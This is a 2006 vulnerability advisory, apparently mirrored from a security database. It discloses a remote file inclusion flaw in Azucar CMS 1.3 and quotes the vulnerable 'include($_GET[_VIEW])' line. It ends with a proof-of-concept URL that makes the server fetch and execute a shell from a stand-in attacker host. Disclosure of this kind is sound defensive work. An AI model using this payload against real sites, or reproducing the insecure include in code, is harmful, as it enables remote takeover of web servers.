Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15452
HistoryDec 20, 2006 - 12:00 a.m.

Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability

2006-12-2000:00:00
vulners.com
47

±------------------------------------------------------------------------------------------

  • Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability
    ±------------------------------------------------------------------------------------------
  • Affected Software .: Azucar CMS <= 1.3
  • Download …: http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip
  • Description …: "Azucar is a modular content management system designed to be extremely user friendly"
  • Class …: Remote File Inclusion
  • Risk …: High (Remote File Execution)
  • Found By …: nuffsaid <nuffsaid[at]newbslove.us>
    ±------------------------------------------------------------------------------------------
  • Details:
  • Azucar CMS admin/index_sitios.php uses the include function insecurely on the $_GET[_VIEW]
  • paramater passed to the script, a remote file can be specified and executed on the server.
  • Vulnerable Code:
  • admin/index_sitios.php, line(s) 14-15:
  • -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]);
  • Proof Of Concept:
  • http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php
    ±------------------------------------------------------------------------------------------